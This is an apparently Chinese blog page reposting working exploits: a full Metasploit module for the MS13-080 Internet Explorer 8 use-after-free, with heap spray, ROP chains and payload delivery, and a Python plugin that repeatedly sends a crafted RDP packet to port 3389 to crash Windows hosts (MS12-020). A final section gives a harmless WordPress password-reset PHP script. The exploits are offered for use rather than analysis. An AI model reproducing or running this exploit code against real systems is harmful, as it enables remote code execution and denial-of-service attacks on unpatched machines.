分类 技术类 下的文章

MS13-080 exploit 附Poc

说明:此exp在土司论坛看到的,其他各大论坛均未发布,特转载和基友们分享下。

在msf下使用,目前msf还未更新此漏洞exp。

测试通过,WIN7+office2007/2010/java+IE8和WinXP+IE8

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({
:ua_name    => HttpClients::IE,
:ua_minver  => "8.0",
:ua_maxver  => "8.0",
:javascript => true,
:os_name    => OperatingSystems::WINDOWS,
:rank       => NormalRanking
})

def initialize(info={})
super(update_info(info,
'Name'           => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",
'Description'    => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally
found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,
around the same time frame as CVE-2013-3893, except this was kept out of the public eye by
multiple research companies and the vendor until the October patch release.

This issue is a use-after-free vulnerability in CDisplayPointer via the use of a
"onpropertychange" event handler. To setup the appropriate buggy conditions, we first craft
the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.
If we use a select() function for the CTextArea element, two important things will happen:
a CDisplayPointer object will be created for CTextArea, and it will also trigger another
event called "onselect". The "onselect" event will allow us to setup for the actual event
handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child
of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger
"onpropertychange".  During "onpropertychange" event handling, a free of the CDisplayPointer
object can be forced by using an "Unslect" (other approaches also apply), but a reference
of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after
the CDoc::GetLineInfo call, because it is still trying to use that to update
CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash
finally occurs due to accessing the freed memory. By controlling this freed memory, it is
possible to achieve arbitrary code execution under the context of the user.
},
'License'        => MSF_LICENSE,
'Author'         =>
[
'Unknown', # Exploit in the wild
'sinn3r'   # Metasploit
],
'References'     =>
[
[ 'CVE', '2013-3897' ],
[ 'OSVDB', '98207' ],
[ 'MSB', 'MS13-080' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],
[ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]
],
'Platform'       => 'win',
'Targets'        =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', {} ],
[ 'IE 8 on Windows 7',      {} ]
],
'Payload'        =>
{
'BadChars'       => "x00",
'PrependEncoder' => "x81xc4x0cxfexffxff" # add esp, -500
},
'DefaultOptions'  =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Privileged'     => false,
# Jsunpack first received a sample to analyze on Sep 12 2013.
# MSFT patched this on Oct 8th.
'DisclosureDate' => "Oct 08 2013",
'DefaultTarget'  => 0))
end

def get_check_html
%Q|<html>
<script>
#{js_os_detect}

function os() {
var detect = window.os_detect.getVersion();
var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version;
return os_string;
}

function dll() {
var checka = 0;
var checkb = 0;
try {
checka = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch (e) {}

try {
checkb = new ActiveXObject("SharePoint.OpenDocuments.3");
} catch (e) {}

if ((typeof checka) == "object" && (typeof checkb) == "object") {
try{location.href='ms-help://'} catch(e){}
return "#{@js_office_2010_str}";
}
else if ((typeof checka) == "number" && (typeof checkb) == "object") {
try{location.href='ms-help://'} catch(e){}
return "#{@js_office_2007_str}";
}
return "#{@js_default_str}";
}

window.onload = function() {
window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll();
}
</script>
</html>
|
end

def junk
rand_text_alpha(4).unpack("V")[0].to_i
end

def get_payload(target_info)
rop_payload = ''
os          = target_info[:os]
dll_used    = ''

case target_info[:dll]
when @js_office_2007_str
dll_used = "Office 2007"

pivot =
[
0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4
junk,       # ESI due to POPAD
junk,       # EBP due to POPAD
junk,
junk,       # EBX due to POPAD
junk,       # EDX due to POPAD
junk,       # ECX due to POPAD
0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)
0x51bd81db, # ROP NOP
junk        # Padding for the retn 4 from the stack pivot
].pack("V*")

rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})

when @js_office_2010_str
dll_used = "Office 2010"

pivot =
[
0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4
junk,
junk,
junk,
junk,
junk,
0x51BE7E9A, # ROP NOP
junk        # Padding for the retn 4 from the stack pivot
].pack("V*")

rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})

when @js_default_str
if target_info[:os] =~ /windows xp/i
# XP uses msvcrt.dll
dll_used = "msvcrt"

pivot =
[
0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret
].pack("V*")

rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
else
# Assuming this is Win 7, and we'll use Java 6 ROP
dll_used = "Java"

pivot =
[
0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn
junk        # Padding for the POP ECX
].pack("V*")

rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
end
end

print_status("Target uses #{os} with #{dll_used} DLL")

rop_payload
end

def get_sploit_html(target_info)
os         = target_info[:os]
js_payload = ''

if os =~ /Windows (7|XP) MSIE 8.0/
js_payload = Rex::Text.to_unescape(get_payload(target_info))
else
print_error("Target not supported by this attack.")
return ""
end

%Q|<html>
<head>
<script>
#{js_property_spray}
sprayHeap({shellcode:unescape("#{js_payload}")});

var earth = document;
var data = "";
for (i=0; i<17; i++) {
if (i==7) { data += unescape("%u2020%u2030"); }
else      { data += "u4141u4141"; }
}
data += "u4141";

function butterfly() {
for(i=0; i<20; i++) {
var effect = earth.createElement("div");
effect.className = data;
}
}

function kaiju() {
var godzilla = earth.createElement("textarea");
var minilla = earth.createElement("pre");
earth.body.appendChild(godzilla);
earth.body.appendChild(minilla);
godzilla.appendChild(minilla);

godzilla.onselect=function(e) {
minilla.swapNode(earth.createElement("div"));
}

var battleStation = false;
var war = new Array();
godzilla.onpropertychange=function(e) {
if (battleStation == true) {
for (i=0; i<50; i++) {
war.push(earth.createElement("span"));
}
}

earth.execCommand("Unselect");

if (battleStation == true) {
for (i=0; i < war.length; i++) {
war[i].className = data;
}
}
else {
battleStation = true;
}
}

butterfly();
godzilla.select();
}
</script>
</head>
<body onload='kaiju()'>
</body>
</html>
|
end
def on_request_uri(cli, request)
if request.uri =~ /search?o=(.+)&d=(.+)$/
target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }
sploit = get_sploit_html(target_info)
send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
return
end

html = get_check_html
print_status("Checking out target...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
end

def exploit
@js_office_2007_str = Rex::Text.rand_text_alpha(4)
@js_office_2010_str = Rex::Text.rand_text_alpha(5)
@js_default_str     = Rex::Text.rand_text_alpha(6)
super
end

end
=begin

+hpa this for debugging or you might not see a crash at all :-)

0:005> r
eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c
eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!QIClassID+0x30:
6d6dc123 8b03            mov     eax,dword ptr [ebx]  ds:0023:0777efd4=????????
0:005> u
mshtml!QIClassID+0x30:
6d6dc123 8b03            mov     eax,dword ptr [ebx]
6d6dc125 8365e800        and     dword ptr [ebp-18h],0
6d6dc129 8d4de8          lea     ecx,[ebp-18h]
6d6dc12c 51              push    ecx
6d6dc12d 6870c16d6d      push    offset mshtml!IID_IProxyManager (6d6dc170)
6d6dc132 53              push    ebx
6d6dc133 bf02400080      mov     edi,80004002h
6d6dc138 ff10            call    dword ptr [eax]

=end

 

 

附 微软安全公告: http://technet.microsoft.com/zh-tw/security/bulletin/ms13-080
PoC: http://pan.baidu.com/s/1mpeby
个人感觉PoC上的触发略鸡肋...
两个PoC, 我稍微改了下, 还是算转载吧, 对应CVE-2013-3893和3897, 内含福利, 测试请自备纸巾

ms12020 远程3389蓝屏攻击插件py版本

以下代码 保存为 qingms12020.py

传送门:http://mstoor.duapp.com/view/?pid=16

[code lang="js"]
# -*- coding: cp936 -*-
'''
mst=>plugin=>exploit
ms12_020
'''
from socket import *
class mstplugin:
'''ms12_020'''
infos = [
['插件','ms12_020 远程3389蓝屏Exploit'],
['作者','mst'],
['更新','2013/10/22'],
['网址','http://mstoor.duapp.com/']
]
opts = [
['RHOST','192.168.1.2','REMOTE HOST'],
['RPORT','3389','REMOTE PORT'],
['TIMES','100','SEND BUF TIMES'],
['TIMEOUT','5','SOCK SETTIMEOUT'],
['PAYLOAD','false','NO RETURN PAYLOAD']
]
buf=""
buf+="x03x00x00x13x0exe0x00x00"
buf+="x00x00x00x01x00x08x00x00"
buf+="x00x00x00x03x00x01xd6x02"
buf+="xf0x80x7fx65x82x01x94x04"
buf+="x01x01x04x01x01x01x01xff"
buf+="x30x19x02x04x00x00x00x00"
buf+="x02x04x00x00x00x02x02x04"
buf+="x00x00x00x00x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="xffxffx02x04x00x00x00x02"
buf+="x30x19x02x04x00x00x00x01"
buf+="x02x04x00x00x00x01x02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="x04x20x02x04x00x00x00x02"
buf+="x30x1cx02x02xffxffx02x02"
buf+="xfcx17x02x02xffxffx02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x00x02x04x00x00x00x01"
buf+="x02x02xffxffx02x04x00x00"
buf+="x00x02x04x82x01x33x00x05"
buf+="x00x14x7cx00x01x81x2ax00"
buf+="x08x00x10x00x01xc0x00x44"
buf+="x75x63x61x81x1cx01xc0xd8"
buf+="x00x04x00x08x00x80x02xe0"
buf+="x01x01xcax03xaax09x04x00"
buf+="x00xcex0ex00x00x48x00x4f"
buf+="x00x53x00x54x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04x00x00"
buf+="x00x00x00x00x00x0cx00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x01xcax01x00x00x00x00"
buf+="x00x10x00x07x00x01x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04xc0x0c"
buf+="x00x0dx00x00x00x00x00x00"
buf+="x00x02xc0x0cx00x1bx00x00"
buf+="x00x00x00x00x00x03xc0x2c"
buf+="x00x03x00x00x00x72x64x70"
buf+="x64x72x00x00x00x00x00x80"
buf+="x80x63x6cx69x70x72x64x72"
buf+="x00x00x00xa0xc0x72x64x70"
buf+="x73x6ex64x00x00x00x00x00"
buf+="xc0x03x00x00x0cx02xf0x80"
buf+="x04x01x00x01x00x03x00x00"
buf+="x08x02xf0x80x28x03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xefx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xebx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xecx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xedx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xeex03x00x00x0bx06xd0x00"
buf+="x00x12x34x00"
def exploit(self):
'''start exploit'''
color.cprint("[+] Connect to %s .."%RHOST,YELLOW)
for i in range(int(TIMES)):
s=socket(AF_INET,SOCK_STREAM)
s.settimeout(int(TIMEOUT))
try:
s.connect((RHOST,int(RPORT)))
color.cprint("[+] Send %-5s Bytes.."%len(self.buf),GREEN)
s.send(self.buf)
rec=s.recv(100)
color.cprint("[+] Recv %-5s Bytes.."%len(rec),YELLOW)
s.close()
except Exception,e:
color.cprint("[!] Exploit False !CODE:%s"%e,RED)

[/code]

wordpress密码,邮箱忘了,且主机禁用了mail() 函数如何找回密码的解决办法!

wordpress无法发送电子邮件。可能原因:您的主机禁用了 mail() 函数解决办法!

1.WORDPRESS找回密码工具

请将下面代码中数据库信息改为自己的,保存为.php文件,传至空间运行一次即可。密码将改为123321。
程序代码

<?
$mysql_server_name='xxx.xxx.xxx.xxx';
$mysql_username='xxxxx';
$mysql_password='xxxxx';
$mysql_database='xxxxx';
MYSQL_CONNECT($mysql_server_name,$mysql_username,$mysql_password) or DIE("Unable to connect to database");
echo "conn<br>";
@mysql_select_db("$mysql_database") or die("Unable to select database");
echo "table<br>";
$sql="update `wp_users` set user_pass = 'c8837b23ff8aaa8a2dde915473ce0991' where id=1" ;
$result=mysql_query($sql);
echo "ok";
?>
记得登陆后修改密码!
查询某用户信息,可加入如下代码
程序代码$sql="select user_login,user_pass from `wp_users` where id=1" ;
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
echo $row["user_login"];
echo "<br>";
echo $row["user_pass"];
echo "<br>";

2登陆phpmyadmin,打开安装Wordpress的数据库,找到最底下的wp_user表,选择浏览,这时就会看到当前的用户信息(刚安装只有admin和邮箱),点击前面的编辑,在那一长串md5加密的密码处填入“5d41402abc4b2a76b9719d911017c592”,OK,用密码“hello”登陆即可。不要忘记登陆后把密码改掉哦。其实看到邮箱信息以后,只要邮箱是有效的,也可以通过wordpress后台邮件找回密码的功能 来找回 你的密码的。